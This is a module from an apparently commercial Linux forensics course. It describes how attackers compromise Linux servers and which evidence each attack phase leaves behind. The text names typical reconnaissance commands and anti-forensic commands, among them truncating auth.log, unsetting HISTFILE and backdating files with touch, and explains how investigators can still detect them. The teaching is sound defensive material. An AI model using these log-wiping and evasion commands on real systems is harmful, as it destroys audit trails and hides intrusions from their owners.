LX0.5 The Attacker's Perspective
Why Attackers Target Linux — and What They Do When They Get In
Why Linux Gets Compromised
Linux has a reputation for security that is partially earned and partially mythological. The earned part: Linux’s permission model, mandatory access control frameworks (SELinux, AppArmor), and open-source visibility make it possible to build extremely hardened systems. The mythological part: the assumption that Linux does not get compromised because it is inherently more secure than Windows.
The reality in production environments is different. Linux servers get compromised for reasons that have nothing to do with the operating system’s theoretical security model and everything to do with how they are deployed and managed in practice.
Internet-facing services with known vulnerabilities. Linux runs the majority of the world’s web servers, mail servers, DNS servers, and application infrastructure. Every internet-facing service is an attack surface. When a vulnerability is published for Apache, Nginx, PHP, WordPress, Jenkins, GitLab, Redis, Elasticsearch, or any of the thousands of applications that run on Linux servers, the window between publication and exploitation is measured in hours. The organization that patches in weeks has a weeks-long exposure window. The Northgate Engineering scenario in this course’s opening begins with exactly this pattern — a vulnerable PHP application behind an Nginx reverse proxy.
Weak SSH credential management. SSH brute force is the most common attack against Linux servers because it works. Organizations deploy servers with password authentication enabled, use weak or default passwords for service accounts, leave root SSH login enabled, and fail to implement key-based authentication or fail2ban rate limiting. The attacker does not need a sophisticated exploit — they need patience and a password list. LX4 investigates this pattern in detail.
Infrequent patching. Linux servers are often treated as “deploy and forget” infrastructure. The web server was deployed in 2022, configured once, and has not been updated since. The kernel has known privilege escalation vulnerabilities. The web application has known remote code execution vulnerabilities. The organization’s patch management process covers Windows endpoints and ignores Linux servers because “Linux is more secure.” LX6 investigates the privilege escalation patterns that result from this assumption.
No endpoint detection. The majority of Linux servers in production environments do not have EDR (Endpoint Detection and Response) agents installed. The Windows endpoints in the same organization have CrowdStrike, SentinelOne, or Defender for Endpoint. The Linux servers have nothing — no process monitoring, no network monitoring, no file integrity monitoring, no behavioral detection. The attacker who compromises a Linux server operates in an environment with near-zero detection capability. This course teaches you to investigate without EDR — using the native Linux evidence sources that exist regardless of whether a security agent is installed.
Container and cloud misconfigurations. Docker containers running as root. Kubernetes pods with privileged access. AWS EC2 instances with overly permissive IAM roles. Azure VMs with managed identity access to Key Vault. GCP instances with service account keys stored in environment variables. These misconfigurations are not Linux vulnerabilities — they are deployment errors that give the attacker a path from initial access to infrastructure-wide compromise. LX9 and LX10 investigate these patterns.
The Attacker’s Typical Workflow
Understanding the attacker’s workflow is not just academic — it directly informs the investigation sequence. Attackers follow a predictable pattern, and each step leaves specific artifacts in specific locations.
Step 1: Initial access. The attacker gains a foothold on the system through one of four primary vectors: SSH credential compromise (brute force, password spray, or stolen credentials), web application exploitation (SQL injection, file upload bypass, deserialization vulnerability, SSRF), exposed service exploitation (Redis without authentication, Elasticsearch without authentication, vulnerable Jenkins instance), or supply chain compromise (malicious package, compromised container image, poisoned CI/CD pipeline).
The evidence of initial access depends on the vector. SSH compromise leaves trails in auth.log and wtmp. Web application exploitation leaves trails in web server access logs and error logs. Exposed service exploitation may leave trails in the service’s own log files (Redis logs, Elasticsearch logs) or may be entirely silent if the service does not log connections. Supply chain compromise is the hardest to detect because the malicious code arrives through a trusted channel.
Step 2: Reconnaissance. Within minutes of gaining access, the attacker runs commands to understand the environment: whoami (what user am I?), id (what groups am I in?), uname -a (what kernel version — are there known privilege escalation exploits?), cat /etc/os-release (what distribution and version?), cat /etc/passwd (what other user accounts exist?), ss -tlnp (what services are listening?), df -h (what filesystems are mounted, how much data is there?), cat /etc/crontab (what scheduled tasks exist?), sudo -l (what can I run as root?).
These commands may appear in .bash_history if the attacker uses an interactive shell. They will appear in auditd logs if auditd is configured. They will not appear anywhere else — this is the “dark zone” of Linux forensics where activity occurs but is not recorded by default. One of the core recommendations of this course is deploying auditd rules that illuminate this dark zone before the next incident occurs.
Step 3: Persistence. The attacker establishes mechanisms to maintain access: SSH key deployment (adding their public key to ~/.ssh/authorized_keys), cron job creation (a scheduled task that re-downloads and executes their payload), systemd service installation (a service that starts on boot), or more advanced techniques like shared library injection (/etc/ld.so.preload) and PAM module backdoors.
The evidence of persistence exists in the persistence mechanisms themselves — each is a file on the filesystem with a creation timestamp that correlates with the compromise timeline. LX7 investigates every persistence mechanism in detail.
Step 4: Privilege escalation. If the attacker gained access as a non-root user (common with web application compromise, where the initial shell runs as www-data), they escalate to root. The most common techniques: exploiting a SUID binary with a known vulnerability (PwnKit, DirtyCOW successors), exploiting a kernel vulnerability, abusing a sudo misconfiguration, or escaping a container to the host.
The evidence of privilege escalation appears in auditd logs (if configured) as execve system calls for SUID binaries by non-root users, in kernel logs (dmesg, kern.log) as crash reports or unusual kernel messages, and in filesystem artifacts as newly created files owned by root in directories writable by the attacker’s initial user.
Step 5: Objective execution. The attacker achieves their goal: deploying a cryptominer for revenue, exfiltrating data for sale or espionage, deploying ransomware for extortion, establishing a persistent foothold for future operations, or using the server as a pivot point for lateral movement to higher-value targets.
The evidence of objective execution varies by objective. Cryptominers leave process artifacts, network connections to mining pools, and high CPU utilization records. Data exfiltration leaves file access records (if auditd is configured), network connection records, and potentially command history showing tar, scp, curl, or wget commands. Ransomware leaves encrypted files, ransom notes, and the encryption binary. Lateral movement leaves SSH connection records in auth.log on both the source and destination systems.
The Anti-Forensics Problem — and Why It Fails
Attackers know about auth.log and .bash_history. The more capable ones attempt to destroy this evidence. But complete evidence destruction on Linux is harder than most attackers realize, because the evidence is distributed across so many independent sources.
An attacker who truncates auth.log (> /var/log/auth.log) removes the authentication event history — but wtmp still records their login sessions, the systemd journal still contains the SSH events in a separate binary file, and if auditd is running, the authentication events are also recorded in audit.log. To truly eliminate all authentication evidence, the attacker must address four independent log sources. Most attackers address one or two.
An attacker who runs unset HISTFILE prevents their commands from being written to .bash_history — but auditd (if configured with -a always,exit -F arch=b64 -S execve) records every command execution at the system call level, regardless of what the shell does with its history. The attacker can defeat bash history but cannot defeat auditd without root access and specific knowledge of how to disable it without being logged doing so.
An attacker who uses touch to backdate a file’s modification time can fool a naive investigator who only checks mtime — but the ctime (inode change time) updates automatically and cannot be set by userspace tools. The discrepancy between mtime and ctime is itself evidence of tampering.
An attacker who installs a rootkit to hide processes from ps can evade userspace detection tools — but a memory dump analyzed with Volatility 3 reads the kernel’s process list directly, bypassing the rootkit’s userspace hooks. The rootkit hides the process from ps. It cannot hide it from a memory dump.
The principle: the attacker must defeat every evidence source simultaneously. Missing even one source leaves a trail. Investigators who check multiple sources catch the evidence that the attacker’s anti-forensic technique did not cover. This is why the cross-correlation approach — checking authentication across auth.log AND wtmp AND journal AND auditd — is the foundation of Linux investigation methodology.
| |
Worked artifact — Attacker workflow reconstruction template:
Complete this timeline as you identify evidence of each attack phase.
Case: INC-2026-XXXX System: [hostname]
Initial access: Method: ___ | Source: ___ | Timestamp: ___ Reconnaissance: Commands: ___ | Evidence: bash_history / auditd Persistence: ☐ SSH key ☐ Cron ☐ Systemd ☐ ld.so.preload ☐ Other Privilege escalation: Method: ___ | Root achieved: ☐ Yes ☐ No Objective: ☐ Cryptomining ☐ Data exfil ☐ Lateral movement ☐ Ransomware ☐ Botnet Anti-forensics: ☐ History deleted ☐ Logs truncated ☐ Timestamps faked ☐ Rootkit
Myth: “Linux servers are targeted less frequently than Windows, so they need less monitoring.”
Reality: Linux runs 96% of the world’s top 1 million web servers, the majority of cloud infrastructure, and nearly all container workloads. The perception that Linux is “less targeted” comes from lower visibility — most Linux servers lack EDR agents and centralized logging. Servers are compromised at comparable rates; the compromises are detected less often and later. Cryptomining campaigns specifically target Linux because always-on, high-CPU servers are ideal for mining — and the absence of monitoring means miners run undetected for weeks.
Decision points: predicting the next attack phase
If you have identified initial access, predict the next steps: SSH brute force → check authorized_keys + bash history + /tmp for tools. Web exploit → check web root for web shells + process tree for reverse shells + privesc to root. Stolen cloud creds → check CloudTrail for API calls + new IAM roles + lateral movement to other resources.
Troubleshooting: when the attacker’s workflow is unclear
No bash history and no auditd. Pivot to: filesystem timestamps (find -mtime), package manager logs, network connections, /proc enumeration.
Multiple persistence mechanisms found. Attackers deploy redundant persistence — document ALL before recommending eradication. Missing one means the attacker returns.
Try it: On a Linux system, run the attacker workflow trace commands from the code block above. Check whether your system has evidence of reconnaissance commands in any user’s bash history. Check whether any systemd services or authorized_keys files were created after the OS installation. Check for outbound connections on common mining pool ports. You are practicing the same evidence checks you will use in every investigation scenario in this course.
Check your understanding:
- List three reasons why Linux servers are compromised in practice, despite the operating system’s security capabilities.
- An attacker gains access via SSH brute force, deploys an SSH key for persistence, and then truncates auth.log. What evidence of their activity still exists?
- What reconnaissance commands does a typical attacker run immediately after gaining access, and where might the evidence of these commands be found?
- Why is the absence of an EDR agent on a Linux server both a disadvantage for detection and a non-issue for investigation methodology?
You're reading the free modules of this course
The full course continues with advanced topics, production detection rules, worked investigation scenarios, and deployable artifacts. Premium subscribers get access to all courses.